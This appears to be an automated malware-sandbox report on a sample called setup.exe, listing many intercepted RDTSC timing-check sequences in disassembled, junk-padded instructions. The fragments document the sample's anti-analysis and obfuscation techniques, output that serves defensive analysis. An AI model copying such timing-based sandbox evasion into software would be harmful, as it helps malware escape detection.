                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 610FF5 second address: 611000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 611000 second address: 611006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 611006 second address: 61100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61100D second address: 611015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615CFA second address: 615D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Ch 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FC169461A9Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615D18 second address: 615D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615D20 second address: 615D25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614F3B second address: 614F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A287h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC16945A276h 0x0000000f jmp 00007FC16945A27Ch 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614F68 second address: 614FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FC169461AA8h 0x00000013 jnc 00007FC169461A96h 0x00000019 pop edi 0x0000001a jmp 00007FC169461AA2h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614FAE second address: 614FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614FB4 second address: 614FBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614FBE second address: 614FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615130 second address: 61513B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61513B second address: 615150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Ah 0x00000009 jc 00007FC16945A276h 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615426 second address: 61542A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6155AF second address: 6155B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6159F9 second address: 6159FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6159FF second address: 615A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FC16945A27Eh 0x0000000b pushad 0x0000000c jmp 00007FC16945A27Ah 0x00000011 push esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 617282 second address: 61728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61728D second address: 617291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61FB56 second address: 61FB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AB3A8 second address: 5AB3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A289h 0x00000009 jmp 00007FC16945A289h 0x0000000e jmp 00007FC16945A287h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FC16945A276h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AB3FE second address: 5AB40A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AB40A second address: 5AB40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61E904 second address: 61E908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EA5A second address: 61EA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A283h 0x00000009 jg 00007FC16945A276h 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EA78 second address: 61EA98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007FC169461A96h 0x0000000b jp 00007FC169461A96h 0x00000011 jnl 00007FC169461A96h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EA98 second address: 61EAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC16945A27Ah 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EAAF second address: 61EAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EC22 second address: 61EC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EC26 second address: 61EC49 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC169461A96h 0x00000008 jmp 00007FC169461AA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF4C second address: 61EF54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF54 second address: 61EF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF5C second address: 61EF74 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 jl 00007FC16945A276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FC16945A276h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF74 second address: 61EF7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F0CC second address: 61F0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F602 second address: 61F608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F608 second address: 61F60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F60C second address: 61F612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F612 second address: 61F62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC16945A282h 0x0000000c jmp 00007FC16945A27Ch 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 628174 second address: 628179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 628179 second address: 628192 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC16945A27Bh 0x00000008 jp 00007FC16945A276h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 628192 second address: 628196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 626FD9 second address: 627019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A281h 0x00000008 jmp 00007FC16945A285h 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FC16945A276h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FC16945A276h 0x0000001e jnp 00007FC16945A276h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627019 second address: 62701D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA4C8 second address: 5EA4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC16945A276h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA73F second address: 5EA745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EAD0E second address: 5EAD21 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC16945A278h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EAFC6 second address: 5EAFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC169461A9Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 jp 00007FC169461A9Ch 0x00000016 lea eax, dword ptr [ebp+1248EA70h] 0x0000001c sub edx, dword ptr [ebp+122D29EFh] 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A483F second address: 5A4852 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FC16945A276h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62735D second address: 62737F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007FC169461A96h 0x0000000c jmp 00007FC169461AA4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62760E second address: 627618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627618 second address: 62761C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62761C second address: 62763F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC16945A289h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62763F second address: 627649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC169461A96h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627649 second address: 62765F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC16945A27Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62765F second address: 627663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627663 second address: 62766D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627D81 second address: 627D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62D5D7 second address: 62D5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62C825 second address: 62C833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62C833 second address: 62C837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62C837 second address: 62C843 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62C843 second address: 62C847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62C847 second address: 62C856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62C856 second address: 62C85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62CDDE second address: 62CDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62CF3C second address: 62CF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 631178 second address: 63117C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63117C second address: 6311A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jo 00007FC16945A29Eh 0x0000000d pushad 0x0000000e jmp 00007FC16945A288h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63919E second address: 6391D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC169461AA1h 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007FC169461AA9h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6391D3 second address: 6391DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6391DB second address: 6391DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59DDD6 second address: 59DDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59DDDC second address: 59DDEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b ja 00007FC169461A96h 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63C952 second address: 63C956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63C956 second address: 63C95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63CEC2 second address: 63CEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63CEC6 second address: 63CEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC169461A9Bh 0x00000011 jmp 00007FC169461A9Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 63D06D second address: 63D085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A284h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64373C second address: 64374C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 jnp 00007FC169461A9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 641FBD second address: 641FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 642158 second address: 64215E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64215E second address: 642173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6423D0 second address: 6423D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6423D6 second address: 6423DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6423DC second address: 642420 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FC169461A96h 0x00000009 jmp 00007FC169461AA2h 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FC169461AA8h 0x00000015 jmp 00007FC169461A9Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 642420 second address: 642439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FC16945A296h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC16945A27Ah 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA906 second address: 5EA90B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA90B second address: 5EA98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FC16945A27Ch 0x0000000f pop edx 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC16945A278h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b xor cl, 00000079h 0x0000002e mov ebx, dword ptr [ebp+1248EAAFh] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FC16945A278h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e pushad 0x0000004f mov bh, ah 0x00000051 popad 0x00000052 add eax, ebx 0x00000054 mov edx, dword ptr [ebp+122D19DEh] 0x0000005a nop 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FC16945A284h 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA98C second address: 5EAA1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC169461A9Ah 0x0000000f nop 0x00000010 pushad 0x00000011 xor dword ptr [ebp+1246A1FDh], edx 0x00000017 call 00007FC169461A9Ah 0x0000001c add edi, dword ptr [ebp+122D1D10h] 0x00000022 pop ebx 0x00000023 popad 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FC169461A98h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jc 00007FC169461A99h 0x00000046 movsx edi, si 0x00000049 push edi 0x0000004a mov ch, bl 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 ja 00007FC169461AADh 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64B3F4 second address: 64B3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
